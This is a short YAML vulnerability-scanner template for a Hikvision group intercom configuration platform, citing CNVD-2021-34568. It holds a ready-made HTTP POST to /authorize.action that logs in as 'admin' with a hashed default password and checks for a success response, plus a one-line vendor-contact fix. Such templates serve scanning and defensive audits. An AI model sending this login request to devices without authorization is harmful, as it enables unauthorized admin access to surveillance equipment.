product: 海康威视群组对讲服务配置平台
vName: 海康威视群组对讲服务配置平台 默认口令
type: 默认口令/弱口令
vID: [ ]
level: 3
vDesc: ''
version: ''
note: ''
search: { }
protocol: http
link: https://www.cnvd.org.cn/flaw/show/CNVD-2021-34568
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: post
      follow: false
      path: /authorize.action
      header:
        Content-Type: application/x-www-form-urlencoded
      data: 'username=admin&userpsw=827ccb0eea8a706c4c34a16891f84e7b&language=zh_cn'
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - '{"success": true, "msg": "OK"}'
            logic: and